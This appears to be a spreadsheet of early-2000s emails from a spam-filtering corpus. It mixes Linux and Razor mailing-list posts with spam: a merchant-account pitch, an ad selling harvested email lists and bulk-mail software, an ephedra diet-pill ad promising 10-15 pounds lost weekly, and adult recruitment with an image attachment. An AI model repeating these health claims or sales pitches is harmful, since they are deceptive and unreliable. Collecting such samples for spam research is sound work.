 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Liberation: Les jouebs, stars editoriales du Web.
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://scriptingnews.userland.com/backissues/2002/09/25#When:9:59:11AM
 Date: Wed, 25 Sep 2002 16:59:11 GMT
 Liberation: Les jouebs, stars editoriales du Web[1].
 [1] http://www.liberation.com/page.php?Article=55024
</t>
  </si>
  <si>
    <t xml:space="preserve">On Thu, Aug 08, 2002 at 11:27:59AM +0100, wintermute mentioned:
 &gt; Interesting. I've always wondered about things 'considered' to be bad. 
 &gt; Example the GOTO, most languages support a goto of some sort, so are gotos really bad?
  Yes. Especially in the languages he was talking about - C, Pascal and
 Assembler. Goto's can be used well; there are a few used in the kernel
 code to improve efficency. They are almost required in some languages
 (like C) where 'break' or 'continue' can't be told how many loops/switches
 to break out of.
  But, in general, goto's make a mess of code.
 &gt; Is a loop or a recursive call actually any better than a goto 
 &gt; or is the goto used as a kind of common enemy of 
 &gt; programming syntax
 &gt; to make sure people use loops or recursion?
 &gt; &lt;&lt;To iterate is human, to recurse divine&gt;&gt;
  Recursion is only truely useful if you have an infinite stack. People
 that think they have an infinite stack shouldn't be let near a compiler.
 &gt; Kind of makes you wonder about things considered to be 'good'.  For
 &gt; example people bang on about polymorphism, but is there actually any
 &gt; advantage in using an overloaded function based on class inheritance?
  I don't care, to be honest.
 Kate
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] razor unblessed reference
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Vipul Ved Prakash said:
 &gt; Are there any suggestions for "fixing" this in razor-agents? razor-agents
 &gt; could write to syslog by default, but I am not sure if that would be
 &gt; desirable default behaviour...
 Hi Vipul,
 I reckon if the "unwritable log file" error condition could be caught by
 Razor and handled gracefully (logging to syslog or /dev/null), it'd be a
 great help.
 As it stands, if the log file is unwritable, the razor check falls over
 entirely as the constructor returns undef (unblessed reference = 'die'
 error in perl).
 --j.
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Expand Your Business! [wz6lo]
</t>
  </si>
  <si>
    <t xml:space="preserve">
 Expand your business! Make it easy for your customers
 to pay using Visa, Master Card, Discover, American
 Express, Debit Card and Checks via Phone/Fax/Internet.
 How? Through a business Merchant Account!
 By providing multiple methods of acceptable payment
 you automatically help ensure that it will be easier
 for them to pay you and build up trust. People DON'T
 want to send cash or checks via mail, because it is
 dangerous and gives them absolutely no guarantees
 whatsoever.
 So make it easier for your customers and setup a
 Merchant Account for your business. There are NO setup
 fees, and the monthly costs are very low. To obtain
 more information, please reply to this email with 
 your name, phone number with area code, and a good
 time to call. You will be contacted within 10
 business days by one of our staff. Thank you for
 your time.
 To be removed from our contact list, send us an
 email with the subject "Remove"  and you will be
 automatically taken off our list. If removal does
 not work, reply with your email address in the Body
 of the email
</t>
  </si>
  <si>
    <t xml:space="preserve">bitbitch@magnesium.net wrote:
 &gt;I'm also going to also rescind my prior request not to have a member-only
 &gt;fork.   As snobby and elitist as a member-only FoRK would be, I'm starting
 &gt;to feel the pain of the whole spam to bits ratio on fork.
 &gt;
 Here, here... The member-only lists that I'm on have a spam count of 
 near zero. An additional benefit is that the list archives aren't full 
 of spam either.
 E
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] BBC suggest using Linux over MS software
</t>
  </si>
  <si>
    <t xml:space="preserve">This sounds very similar to what was read on the internet spot on 2fm last
 Thursday too.
 -----Original Message-----
 From: ilug-admin@linux.ie [mailto:ilug-admin@linux.ie]On Behalf Of
 John_White@dell.com
 Sent: 25 July 2002 13:53
 To: ilug@linux.ie
 Subject: [ILUG] BBC suggest using Linux over MS software
 Near the top :
 "One of the easiest ways to avoid many common [security] problems is to stop
 using Microsoft software. "
 And further on :
 "The ultimate step would be to use a Mac or install Linux on your PC..."
 cool !
 http://news.bbc.co.uk/2/hi/technology/2143630.stm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</si>
  <si>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&lt;html&gt;
 &lt;head&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=gb2312"&gt;
 &lt;meta name="GENERATOR" content="Microsoft FrontPage 4.0"&gt;
 &lt;meta name="ProgId" content="FrontPage.Editor.Document"&gt;
 &lt;title&gt;You are receiving this email because you registered to receive
 special 
 offers from one of our marketing partners&lt;/title&gt;
 &lt;style&gt;
 &lt;!--
 			span.bug { color: black; font-size: 9px; line-height: 9px; font-family:
 Arial, Helvetica, sans-serif }--&gt;
 &lt;/style&gt;
 &lt;/head&gt;
 &lt;body&gt;
 &lt;font face="Arial"&gt;
 &lt;p&gt;&lt;font color="#0000FF"&gt;&lt;u&gt;The power of Email Marketing&lt;br&gt;  
 &lt;br&gt;  
 &lt;br&gt;  
 &lt;/u&gt;&lt;/font&gt;&lt;/p&gt;  
 &lt;/font&gt;  
 &lt;div&gt;  
 &lt;/div&gt;  
 &lt;div&gt;  
   &lt;font face="Arial" size="3"&gt;Email Marketing is spreading&amp;nbsp;around the
 whole&amp;nbsp;world           
   because of its&amp;nbsp;high effectiveness,&amp;nbsp;&lt;br&gt;         
   speed&amp;nbsp;and&amp;nbsp;low cost.&lt;/font&gt;          
 &lt;/div&gt;          
 &lt;font face="Arial" size="3"&gt;          
 &lt;div&gt;          
   &lt;br&gt;          
   Now if you want to introduce and sell your product or service,&amp;nbsp;
 look for           
   a&amp;nbsp;partner to&amp;nbsp;raise &lt;br&gt;          
   your website's reputation. The best way would be for
 you&amp;nbsp;to&amp;nbsp;use&amp;nbsp;email           
   to contact your&lt;br&gt;
   targeted customer (of course,first,&amp;nbsp;you&amp;nbsp;have to&amp;nbsp;know
 their email addresses). &lt;br&gt;         
 &lt;/font&gt;         
 &lt;br&gt;        
 &lt;/div&gt;        
 &lt;div&gt;        
   &lt;font face="Arial" size="3"&gt;Targeted Email is no doubt very&amp;nbsp;
 effective.&amp;nbsp;           
   If you can introduce your product or service&amp;nbsp;&lt;br&gt;          
   through&amp;nbsp;email directly to the customers&amp;nbsp;who are
 interested&amp;nbsp;in           
   them,&amp;nbsp;&amp;nbsp; this will&amp;nbsp; bring&amp;nbsp;your&amp;nbsp;&lt;br&gt;         
   business&amp;nbsp;a&amp;nbsp;better chance&amp;nbsp;of success.&amp;nbsp;&lt;/font&gt;          
 &lt;/div&gt;          
 &lt;p&gt;&lt;font face="Arial" size="3"&gt;XinLan&amp;nbsp; Internet&amp;nbsp; Marketing&amp;nbsp;
 Center,&amp;nbsp; has&amp;nbsp; many years of&amp;nbsp; experience in
 developing&amp;nbsp;and&amp;nbsp;&lt;br&gt;          
 utilizing&amp;nbsp;internet resources.We have set&amp;nbsp;up&amp;nbsp;global&amp;nbsp;
 business&amp;nbsp;           
 email-address&amp;nbsp;databases&amp;nbsp; &lt;br&gt;          
 which&amp;nbsp;contain &amp;nbsp;millions&amp;nbsp;of email addresses of
 commercial&amp;nbsp;           
 enterprises&amp;nbsp; and consumers&amp;nbsp;&lt;br&gt;          
 all over the world. These&amp;nbsp;emails are sorted by&amp;nbsp;countries&amp;nbsp;  
 and&amp;nbsp; fields. We&amp;nbsp;also continuo-&lt;br&gt;          
 usly&amp;nbsp; update &amp;nbsp;our&amp;nbsp; databases,&amp;nbsp;&amp;nbsp; add&amp;nbsp;
 new&amp;nbsp;           
 addresses&amp;nbsp; and&amp;nbsp;&amp;nbsp; remove &amp;nbsp;undeliverable&amp;nbsp;
 and&amp;nbsp;&lt;br&gt;          
 unsubscribed addresses.&lt;/font&gt;&lt;/p&gt;          
 &lt;p&gt;&lt;font face="Arial" size="3"&gt;With the co-operation with our
 partners,&amp;nbsp; we           
 can supply&amp;nbsp;valid targeted email&amp;nbsp;addresses&amp;nbsp;&lt;br&gt;          
 according &amp;nbsp;to&amp;nbsp; your&amp;nbsp; requirements,&amp;nbsp; by&amp;nbsp;
 which&amp;nbsp; you&amp;nbsp;can&amp;nbsp;           
 easily&amp;nbsp; and &amp;nbsp;directly &amp;nbsp;contact&amp;nbsp;your&amp;nbsp;&lt;br&gt;          
 potential&amp;nbsp;customers.With our help many enterprises and
 individuals&amp;nbsp;have&amp;nbsp;greatly           
 raised &lt;br&gt;          
 the&amp;nbsp;fame of their&amp;nbsp;products or service and found many potential  
 customers.&lt;br&gt;          
 &lt;br&gt;          
 We also supply&amp;nbsp;a&amp;nbsp; wide variety&amp;nbsp;of software.&amp;nbsp; For
 example,           
 Wcast,&amp;nbsp; the software for&amp;nbsp;fast-&lt;br&gt;          
 sending emails:&lt;font color="#000000"&gt;this software is a powerful&amp;nbsp;    
 Internet&amp;nbsp; email-marketing&amp;nbsp; application&amp;nbsp; which &lt;br&gt;          
 is perfect for individuals or businesses to send&amp;nbsp;multiple customized 
 email messages to &lt;br&gt;         
 their customers.&lt;/font&gt;&lt;br&gt;          
 &lt;br&gt;          
 We are pleased to&amp;nbsp;offer you&amp;nbsp;our best prices :&lt;/font&gt;&lt;/p&gt;          
 &lt;div align="left"&gt;          
   &lt;table height="103" width="608" border="1"&gt;          
     &lt;tbody&gt;          
       &lt;tr&gt;          
         &lt;td width="200" height="17"&gt;&lt;b&gt;&lt;font face="Arial"
 size="2"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;           
           Emails&amp;nbsp; or&amp;nbsp; Software&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;          
         &lt;td width="332" height="17"&gt;&lt;b&gt;&lt;font face="Arial"
 size="2"&gt;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;        
           Remarks&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;          
         &lt;td width="64" height="17"&gt;&lt;b&gt;&lt;font face="Arial" color="#000000"
 size="2"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;           
           Price&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;          
       &lt;/tr&gt;          
       &lt;tr&gt;          
         &lt;td width="200" height="94"&gt;&lt;font face="Arial" size="2"&gt;30,000
 targeted           
           email addresses&amp;nbsp;&lt;/font&gt;&lt;/td&gt;          
         &lt;td width="332" height="94"&gt;&lt;font face="Arial"&gt;&lt;br&gt;          
           &lt;font size="2"&gt;We are able to supply valid targeted email
 addresses           
           according to your requirements,which are only compiled on your
 order,           
           such as region / country / occupation / field / Domain Name
 (such as AOL.com or MSN.com) etc.&lt;br&gt;          
           &lt;/font&gt;&lt;/font&gt;&lt;/td&gt;          
         &lt;td width="64" height="115"&gt;&lt;font face="Arial" color="#000000"
 size="1"&gt;&amp;nbsp;           
           USD 30.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;          
       &lt;/tr&gt;          
       &lt;tr&gt;          
         &lt;td width="200" height="15"&gt;&lt;font face="Arial" color="#000000"
 size="2"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;           
           Classified email addresses&lt;/font&gt;&lt;/td&gt;          
         &lt;td width="332" height="15"&gt;&lt;font face="Arial" color="#000000"
 size="2"&gt;&lt;br&gt;          
           Our database contains more than 1600 sorts of email
 addresses,and can           
           meet&amp;nbsp;your most&amp;nbsp;stringent demands.&lt;br&gt;    
           &lt;br&gt;       
  &lt;/font&gt;&lt;/td&gt;       
         &lt;td width="64" height="19"&gt;&lt;font face="Arial" color="#000000"
 size="1"&gt;&amp;nbsp;&amp;nbsp;&lt;/font&gt;&lt;/td&gt;       
       &lt;/tr&gt;       
       &lt;tr&gt;       
         &lt;td width="200" height="6"&gt;&lt;font face="Arial"
 size="2"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;         
           8 million email addresses&lt;/font&gt;&lt;/td&gt;        
         &lt;td width="332" height="6"&gt;&lt;font face="Arial" size="2"&gt;&lt;br&gt;        
           8 million global commercial enterprise email addresses&lt;br&gt;      
           &lt;br&gt;        
           &lt;/font&gt;&lt;/td&gt;       
         &lt;td width="64" height="6"&gt;&lt;font face="Arial" color="#000000"
 size="1"&gt;&amp;nbsp;USD         
           240.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;        
       &lt;/tr&gt;        
       &lt;tr&gt;        
         &lt;td width="200" height="4"&gt;&lt;font face="Arial"
 size="2"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;         
           Wcast software&amp;nbsp;&lt;/font&gt;&lt;/td&gt;        
         &lt;td width="332" height="4"&gt;&lt;font face="Arial" size="2"&gt;&lt;br&gt;        
           Software for fast-sending emails. This program can &lt;br&gt;        
         send mail&amp;nbsp;at         
           the rate of over 10,000 emails per hour, &lt;br&gt;        
         and release information&amp;nbsp;to         
           thousands of people in a &lt;br&gt;        
         short&amp;nbsp; time.&lt;br&gt;      
           &lt;br&gt;        
           &lt;/font&gt;&lt;/td&gt;       
         &lt;td width="64" height="4"&gt;&lt;font face="Arial" color="#000000"
 size="1"&gt;&amp;nbsp;         
           USD 39.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;        
       &lt;/tr&gt;        
       &lt;tr&gt;        
         &lt;td width="200" height="47"&gt;&lt;font face="Arial"
 size="2"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;         
           Email searcher software&amp;nbsp;&lt;/font&gt;&lt;/td&gt;        
         &lt;td width="332" height="47"&gt;&lt;font face="Arial" size="2"&gt;Software
 for         
           searching targeted email addresses.&lt;br&gt;        
           &lt;/font&gt;&lt;/td&gt;        
         &lt;td width="64" height="47"&gt;&lt;font face="Arial" color="#000000"
 size="1"&gt;&amp;nbsp;         
           USD 98.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;        
       &lt;/tr&gt;        
       &lt;tr&gt;        
         &lt;td width="200" height="11"&gt;&lt;font face="Arial"&gt;&lt;b&gt;&lt;font
 color="#000000" size="3"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;         
           &lt;/font&gt;&lt;/b&gt;&lt;font color="#000000" size="2"&gt;Global Trade
 Poster&lt;/font&gt;&lt;/font&gt;&lt;/td&gt;        
         &lt;td width="332" height="11"&gt;&lt;font size="2" face="Arial"&gt;&lt;br&gt;        
           Spread information about your business and your products to over
 1500         
           trade message boards and newsgroups.&lt;br&gt;      
           &lt;br&gt;        
           &lt;/font&gt;&lt;/td&gt;       
         &lt;td width="64" height="11"&gt;&lt;font face="Arial" color="#000000"
 size="1"&gt;&amp;nbsp;USD         
           135.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;        
       &lt;/tr&gt;        
       &lt;tr&gt;        
         &lt;td width="200" height="10"&gt;&lt;font face="Arial"
 size="2"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;         
           Jet-Hits Plus 2000 Pro&amp;nbsp;&lt;/font&gt;&lt;/td&gt;        
         &lt;td width="332" height="10"&gt;&lt;font face="Arial" size="2"&gt;&lt;br&gt;        
           Software for submitting website to 8000+&amp;nbsp; search
 engines.&lt;br&gt;      
           &lt;br&gt;        
           &lt;/font&gt;&lt;/td&gt;       
         &lt;td width="64" height="10"&gt;&lt;font face="Arial" color="#000000"
 size="1"&gt;&amp;nbsp;        
           USD 79.00&amp;nbsp;&lt;/font&gt;&lt;/td&gt;       
       &lt;/tr&gt;       
     &lt;/tbody&gt;       
   &lt;/table&gt;       
 &lt;/div&gt;       
 &lt;font face="Arial"&gt;       
 &lt;p&gt;&lt;br&gt;       
 You may&amp;nbsp;order the email lists&amp;nbsp;or&amp;nbsp;software directly from our
 website. &lt;font color="#000000" size="3"&gt;For&amp;nbsp; further details, &lt;br&gt;   
 please&amp;nbsp;refer to our website&lt;/font&gt;&lt;font size="3"&gt;.&lt;/font&gt;&lt;font
 color="#000000" size="3"&gt;&lt;br&gt;       
 &lt;br&gt;       
 We will be&amp;nbsp; honoured&amp;nbsp; if you are interested&amp;nbsp; in our
 services or        
 software. &lt;/font&gt;Please do not &lt;br&gt;       
 hesitate to contact us&amp;nbsp;with any queries or concern you may
 have.&amp;nbsp; We&amp;nbsp;will        
 be&amp;nbsp;happy to&amp;nbsp;&lt;br&gt;       
 serve you.&lt;br&gt;       
 &lt;br&gt;       
 &lt;br&gt;       
 Best regards!&lt;br&gt;       
 &lt;br&gt;       
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;  
 &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&lt;font size="3"&gt;K. Peng&lt;br&gt;       
 Marketing Manager&lt;br&gt;       
 &lt;font color="#0000ff"&gt;&lt;a
 href="mailto:XinLancenter@163.com"&gt;XinLancenter@163.com&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;
 &lt;/font&gt;&lt;font size="3"&gt;&lt;a href="http://emaildata.9home.net"&gt;&lt;font
 color="#0000ff"&gt;&lt;br&gt;      
 &lt;/font&gt;&lt;/a&gt;&lt;a href="http://emaildata.51software.net"&gt;&lt;font face="Arial"
 color="#0000FF"&gt;Http://Emaildata.51software.net&lt;/font&gt;&lt;/a&gt;&lt;font
 face="Arial"&gt;&lt;br&gt;     
 XinLan Internet Marketing Center&lt;/font&gt;&lt;/font&gt;&lt;/p&gt;     
 &lt;hr&gt;     
 &lt;p&gt;&lt;font size="2" face="Arial"&gt;You are receiving this email because you   
 registered to receive special offers from one of our marketing&amp;nbsp;&lt;br&gt;  
 partners.If you would prefer not to receive future emails, &lt;font
 color="#000000"&gt;&amp;nbsp;please       
 click here to&amp;nbsp; &lt;a
 href="http://unsubscribe-mail.com/index.html?clientid=15"&gt;unsubscribe&lt;/a&gt; 
 , or &lt;/font&gt;&lt;/font&gt;&lt;span class="bug"&gt;&lt;font size="2"&gt;send a &lt;br&gt;      
 blank e-mail to&amp;nbsp; &lt;/font&gt;&lt;/span&gt;&lt;span class="bug"&gt;&lt;font size="2"&gt;&lt;a
 href="mailto:Emailcentre@UP369.com"&gt;Emailcentre@up369.com&lt;/a&gt;&lt;/font&gt;&lt;/span&gt;
 &lt;/p&gt;     
 &lt;hr&gt;     
 &lt;/body&gt;     
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: DayTips' Poem-a-Day: 09/13/02
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Lose 11 Pounds In 7 Days                   IML
</t>
  </si>
  <si>
    <t xml:space="preserve">Long time no chat!
 How have you been? If you've been like me, you've been trying
 trying almost EVERYTHING to lose weight. I know how you feel
 - the special diets, miracle pills, and fancy exercise 
 equipment never helped me lose the pounds I needed to lose
 either. It seemed like the harder I worked at it, the less
 weight I lost - until I heard about 'Extreme Power Plus'.
 You're probably thinking to yourself, "Oh geez, not another
 miracle diet pill!" Like you, I was skeptical at first, but 
 my sister said it helped her lose 23 pounds in just 2 weeks, 
 so I told her I'd give it a try. I mean, there was nothing 
 to lose except a lot of weight! Let me tell you, it was
 the best decision I've ever made.  PERIOD.  Six months later,
 as I'm writing this message to you, I've gone from 355 pounds
 to 210 pounds, and I haven't changed my exercise routine or diet
 at all. Yes, I still eat pizza, and lots of it!
 I was so happy with the results that I contacted the manufacturer
 and received permission to resell it - at a HUGE discount.I feel
 the need to help other people lose weight like I did, because it
 does so much for your self-esteem, not to mention your health.
 I am giving you my personal pledge that 'Extreme Power Plus'
 absolutely WILL WORK FOR YOU. 100 % Money-Back GUARANTEED!
 If you are frustrated with trying other products, without having 
 any success, and just not getting the results you were promised,
 then I recommend the only product that worked for me - 
 'EXTREME POWER PLUS'!
 You're probably asking yourself, "Ok, so how does this stuff
 actually work?"
 Extreme Power Plus contains Lipotropic fat burners and ephedra which 
 is scientifically proven to increase metabolism and cause rapid 
 weight loss. No "hocus pocus" in these pills - just RESULTS!!! 
 Here is the bottom line ...
 I can help you lose 10-15 pounds per week naturally, without
 exercising and without having to eat rice cakes all day. 
 Just try it for one month - there's pounds to lose and confidence 
 to gain! You will lose weight fast - GUARANTEED. This is my
 pledge to you.
 BONUS! Order now and get FREE SHIPPING on 3 bottles or more! 
 To order Extreme Power Plus on our secure server, just click
 on this link -&gt; http://www.2002dietspecials.com/
 To see what some of our customers have said about this product, 
 visit http://www.2002dietspecials.com/testimonials.shtml
 To see a list of ingredients and for more information
 on test studies and how it will help you lose weight, visit 
 http://www.2002dietspecials.com/ingre1.shtml
 **************************************************************
 If you feel that you have received this email in error, please 
 send an email to "print2@btamail.net.cn" requesting to be 
 removed. Thank you, and we apologize for any inconvenience.
 **************************************************************
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Hollywood out of crack, has started smoking tiling grout: "Grease 3"
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8288879,1717/
 Date: 2002-09-26T20:37:17+01:00
 [IMG: http://www.newsisfree.com/Images/fark/aicn.gif ([AintItCoolNews])]
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, 07 Aug 2002 01:38:55 -0400 
 Tom Lane &lt;tgl@sss.pgh.pa.us&gt; wrote:
 &gt; I useta use mh-e regularly, but I never figured out whether it could
 &gt; handle exmh's multidrop mechanism, which is something I've grown to
 &gt; rely on.  Does that work in recent mh-e versions?  I'd love to use
 &gt; mh-e when reading mail remotely, if it can handle my multiple-inbox-
 &gt; folders setup...
 I've no idea.  Have you tried asking on the MH-E lists?
 -- 
 J C Lawrence                
 ---------(*)                Satan, oscillate my metallic sonatas. 
 claw@kanga.nu               He lived as a devil, eh?		  
 http://www.kanga.nu/~claw/  Evil is a name of a foeman, as I live.
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a Multipart MIME message. Since your mail reader
 does not understand this format, some or all of
 this message may not be legible.
 --XX9ADB9A99-1A5B9ADBXX
 Content-Type: text/plain;
 	charset=iso-8859-1
 Content-Transfer-Encoding: 7bit
 K1-Erotikverlag sucht Pornodarsteller.
 Wenn Du Spa am Sex hast und nebenbei Geld verdienen willst, bewirb auch Du Dich. 
 Wir suchen natrliche Frauen und Mnner, jeden Alters. Mollig - kein Problem.
 Infos unter: 0930 830 13 22 aus sterreich
 01 90 87 43 54 aus Deutschland
 1,86 Eu/Min.K1-Callcenter
 Hier ein Bild aus einer Produktion.
 Das Vorstellungsvideo siehst Du unter:
 http://www.k1-web.com/Darsteller/index.php
 Solltest Du an unserem Newsletter kein Interesse
 mehr haben, dann trage Dich bitte aus unter:
 http://www.k1-web.com/newsletr.php
 --XX9ADB9A99-1A5B9ADBXX
 Content-Type: image/jpeg
 Content-Transfer-Encoding: base64
 Content-Disposition: attachment; filename="LenkaWolfgangK1-Pornodarsteller.jpg"
 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
